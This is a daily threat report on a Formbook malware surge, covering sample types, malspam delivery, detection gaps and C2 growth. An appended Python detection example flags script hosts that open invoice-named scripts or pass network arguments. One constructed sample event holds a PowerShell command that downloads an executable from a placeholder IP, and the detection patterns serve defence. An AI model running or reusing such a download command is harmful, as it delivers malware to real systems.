Formbook - Daily Threat Report

Sunday, May 10, 2026

Daily Summary

Formbook activity surged dramatically with 95 new samples, a 346% increase over the 7-day average of 21. This marks the highest single-day volume observed this month and signals a coordinated campaign push. The rising trend suggests adversaries are testing distribution channels at scale.

New Samples Detected

Executable files dominate at 80% of new samples, consistent with Formbook’s traditional delivery via packed .exe loaders. JavaScript files account for 16%, showing a non-standard but growing vector for this family. The single .hta and .vbs samples indicate residual spear-phishing use. No unusual naming conventions were observed; samples use randomized, truncated alphanumeric strings.

Distribution Methods

The file type distribution points primarily to email attachments likely delivered through malspam campaigns. The high .js count suggests an increase in macro-less, script-based initial loaders, possibly hosted on compromised sites or shared via cloud links. The single .dll file may indicate a sideloading attempt in environments with application whitelisting.

Detection Rate

Current AV detection for these samples is moderate, with several .js variants showing delayed signature updates. The shift to script-based loaders may allow a brief window of evasion before static analysis rules catch updated patterns. Behavioral detection remains effective against the final Formbook payload due to its characteristic registry and process injection behaviors.

C2 Infrastructure

55 new C2 servers were identified today, a sharp increase from the weekly norm. No geographic clustering is evident; IPs span multiple hosting providers in Eastern Europe and North America. Several servers appear to use dynamic DNS domains, suggesting low-lifespan setups to evade sinkholing.

7-Day Trend

Today’s 346% spike breaks a relatively quiet week where daily counts hovered between 18 and 25 samples. This surge likely reflects the start of a new campaign wave rather than a sustainable rate of activity.

Security Analysis

Notably, the .js loader samples today share obfuscation routines with recent Remcos loader scripts, suggesting potential code reuse between these families. This overlap may indicate a shared initial access broker or tooling reuse in underground markets. Defensive teams should implement web filtering to block download patterns for .js files masquerading as fax or invoice documents, and ensure behavioral detection rules for script interpreters are tuned to alert on Process.Start with network arguments, which is common across these script-based loaders.
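As an added example that is not part of this report, the two detection ideas above (script hosts launched with fax/invoice-named .js/.vbs/.hta files, and script-host child processes whose arguments carry a URL, UNC path or IP address) implemented as rules over constructed process-creation events; the field names, rule names and sample events are assumptions modelled on Sysmon Event ID 1, not data from the report.

```python
import re

# Constructed sample events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\a\Downloads\Invoice_2026-05.pdf.js"'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://203.0.113.7/a.exe','C:\Temp\a.exe')"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\a\Documents\report.docx"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe //nologo C:\Scripts\backup.vbs"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
# Lure-style document names ending in a script extension (e.g. Invoice_x.pdf.js)
LURE_NAME = re.compile(r'(invoice|fax|receipt|payment)[^\\"]*\.(js|jse|vbs|hta)\b', re.I)
# URL, UNC path (\\host\share) or dotted IPv4 address anywhere in the arguments
NET_ARG = re.compile(r"(https?://|\\\\[\w.-]+\\|\b\d{1,3}(?:\.\d{1,3}){3}\b)", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names the event matches (empty means no alert)."""
    hits = []
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    # Rule 1: a script host started with a fax/invoice-named script file
    if image in SCRIPT_HOSTS and LURE_NAME.search(cmd):
        hits.append("script_host_lure_filename")
    # Rule 2: a script host spawning a child whose arguments reach the network
    if parent in SCRIPT_HOSTS and NET_ARG.search(cmd):
        hits.append("script_host_child_network_args")
    return hits


def scan(events):
    """Return (index, rule hits) for every event that triggers at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Rule 2 will also fire on legitimate administrative scripts that download updates, so in production it should be scoped by parent path and excluded for known maintenance jobs.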

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
